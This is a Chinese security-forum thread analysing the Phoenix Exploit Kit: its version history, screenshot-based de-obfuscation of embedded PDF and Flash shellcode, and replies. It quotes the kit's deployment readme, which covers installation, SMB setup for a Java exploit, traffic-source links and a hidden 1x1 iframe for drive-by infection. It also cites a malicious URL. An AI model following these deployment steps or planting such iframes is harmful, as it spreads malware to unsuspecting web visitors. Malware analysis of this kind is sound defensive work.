吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 72990|回复: 41
收起左侧

[PC样本分析] 国外网马探秘 - Phoenix Exploit Kit

  [复制链接]
是昔流芳 发表于 2012-2-5 09:14
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 是昔流芳 于 2012-2-5 16:56 编辑

此主题分为两部分:
1. Phoenix Exploit Kit 简介
2. Phoenix Exploit Kit 混淆部分还原.
3. Phoenix Exploit Kit 部署过程.

免费评分

参与人数 6威望 +1 吾爱币 +4 热心值 +5 收起 理由
zeekyzzz + 1 + 1 谢谢@Thanks!
wangdongdong + 1 + 1 热心回复!
KaQqi + 2 + 1 热心回复!
kendling + 1 用心讨论,共获提升!
roxiel + 1 精品文章!
sorataxx + 1 感谢发布原创作品,[吾爱破解]因你更精彩!

查看全部评分

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| 是昔流芳 发表于 2012-2-5 16:48
本帖最后由 是昔流芳 于 2012-2-5 16:56 编辑
===========System requirments=============

You need to have following software installed on your server:

1)PHP5

2)MySQL

3)SMB on port 445 (it's possible to install SMB on other server not necessary on the server where exploit's kit itself is installed)

=====================Installing Phoenix Exploits Kit======================

1)Upload install.php to any dir on your server

2)Chmod 777 on that dir

3)Run install.php using browser's address bar and follow instructions shown on the screen

=====================Configuring SMB notes=========================

To make JAVA SMB exploit working you need to have installed SMB on your server:

  ?Install SMB on 445 port
  ?Copy new.avi file from this archive to home/smb dir on your smb server
  ?Edit smb config as shown above:
  
  [global]
  security = share
  [smb]
  comment = smb
  path = /home/smb
  public = yes
  browseable = no
  writeable = no
  guest ok = yes

  To check smb work exec following command: /etc/rc.d/init.d/smb restart

  If we get result showed above:
  
  Shutting down SMB services:                                [  OK  ]
  Shutting down NMB services:                                [  OK  ]
  Starting SMB services:                                     [  OK  ]
  Starting NMB services:                                     [  OK  ]

  then that mean's that everything's all right and SMB installed correctly.

  To check if 445 port is opened use folowing service: http://ping.eu/port-chk/

  As a result we get smb path: \\\\\\\\domain\\\smb\\\new.avi (write "\" char exactly as it showed 8 "\" domain 3 "\" dir 4 "\" file )
  
  If you don't want to install and configure SM yourself then you can use SMB path from author:
  
  1)I can supply and can not supply you SMB path so it's up to me.
  
  2)I do not have any responsibility for my smb host. If it's down and JAVA SMB exploit is not working for you then it's not my problem, it's yours.

==================================Subaccounts==================================

link_for_traffic.php?n=source_name => source_name.exe from dir of exploit's kit
source_name - any latin chars and digits. (a-b, 0-9).

Statistics for traffics seller: statistics_file.php?n=source_name

==================================Change mode==================================

You can switch JAVA exploit between JAVA TC, JAVA RMI, JAVA MIDI.
Which exploit is better depends from traffic, so you need to find it out yourself testing exploit in different modes with your kind of traffics.
You are able to set mode during installation process or switch it any time you want from admin cp.



==========================Sample of correct iframe=============================

<iframe src="http://domain.com/phx/index.php" width="1" height="1" frameborder="0"></iframe>

if you use any other kind of iframe then take a look on it, FireFox infection rate can be 0.


仍待完善...
我是一个坏人 发表于 2014-6-30 16:36
九零-鑫鑫 发表于 2014-1-17 23:48
Mrxn 发表于 2014-6-28 20:12 来自手机
不错的帖子
jacklotus 发表于 2014-4-14 16:20
似乎没看懂
头像被屏蔽
guxiaokang 发表于 2014-3-30 20:32
提示: 作者被禁止或删除 内容自动屏蔽
zzzzyy 发表于 2014-2-1 14:56 来自手机
神啊,这个得认真学习,多谢
少年好学 发表于 2013-12-28 17:08
谢谢楼主分享!!!!
lida_123 发表于 2013-12-16 22:31
支持大牛啊……
混小子 发表于 2013-6-19 13:37
我记得 凤是雌的,凰才是雄的
 楼主| 是昔流芳 发表于 2012-2-5 10:21
Phoenix是凤凰的意思,这一点也在PEK的登录界面有所体现.
0-01.png
提起凤凰,我最先想到的是邓布利多养的那只(条,头,个?).眼泪能治病,还能吞魔咒,送信,当飞行工具,很万能.
在中华文化中,凤凰是百鸟之王.凤凰和朋友,贫穷一样,是合成词.雄为凤,雌为凰(所以说龙凤呈祥啊,一片大雾).
据《山海经·山经·南山经》,又东五百里,曰丹穴之山,其上多金玉.丹水出焉,而南流注于渤海.有鸟焉,其状如鸡,五采而文,名曰凤皇,首文曰德,翼文曰义,背文曰礼,膺文曰仁,腹文曰信.是鸟也,饮食自然,自歌自舞,见则天下安宁.

好了,闲扯完了.
下面简述一下PEK的更新历程.
Phoenix Exploit Kit v3.0(2011年年底放出,最新版本)
Phoenix Exploit Kit v2.8 Mini
Phoenix Exploit Kit v2.7
Phoenix Exploit Kit v2.5(已泄露)
Phoenix Exploit Kit v2.4
Phoenix Exploit Kit v2.3r(略修正,8月放出)
Phoenix Exploit Kit v2.3(2010年6月放出,一份授权2200美元.该版本使PDF漏洞的触发可以绕过ASLR和DEP.)
Phoenix Exploit Kit v2.21
Phoenix Exploit Kit v2.2(增加了对Firefox,Opera和Safari的支持)
Phoenix Exploit Kit v2.1
Phoenix Exploit Kit v2.0(这个改动很大,所以直接跳版本号了)
Phoenix Exploit Kit v1.4(增加了对Chrome的支持)
Phoenix Exploit Kit v1.31
Phoenix Exploit Kit v1.3
Phoenix Exploit Kit v1.2
Phoenix Exploit Kit v1.0
Phoenix Exploit Kit v1.0 BETA
每一次的更新都承接了以前的漏洞支持,并添加了新的漏洞支持.
这一次就以Phoenix Exploit Kit v3.0为例进行反混淆.
0-02.png
 楼主| 是昔流芳 发表于 2012-2-5 16:20
本帖最后由 是昔流芳 于 2012-2-5 16:22 编辑

例子: http://horoshovsebudet.ru:8080/html/yveveqduclirb1.php?n=putty
主页代码: http://pastebin.com/6Y7avW19
可以看出,其中嵌入了两个PDF,将其下载下来.
使用PDFStreamDumper载入PDF.
3-01.PNG
找到有用的数据流,复制到malzilla中.
3-02.PNG
之后就十分简单了.
使用AS3 Sorcerer打开Flash文件,可以看到其中构造的Shellcode.
2-01.PNG
注意,这段代码是经过翻转的,需要还原.
2-02.PNG
这里使用malzilla得到其中的地址.
2-03.PNG
2-04.PNG
2-05.PNG
2-06.PNG
willJ 发表于 2012-2-5 18:10
果断前来支持芳芳牛,不错的东西呀

点评

这个是烂尾,还有好多点没写...  发表于 2012-2-5 18:21
sorataxx 发表于 2012-2-5 22:09
也来支持小芳一下下 ^_^

为毛还要验证问答

免费评分

参与人数 1热心值 +1 收起 理由
是昔流芳 + 1 :)

查看全部评分

virusdefender 发表于 2012-2-6 12:36
支持你啊,网马解密能否像脱壳一样,有没有一个软件,代码解密后再“dump”出来啊?
LBD 发表于 2013-5-18 13:14
不错,支持大牛
faqe 发表于 2013-6-16 23:46
支持大牛
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-28 07:46

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表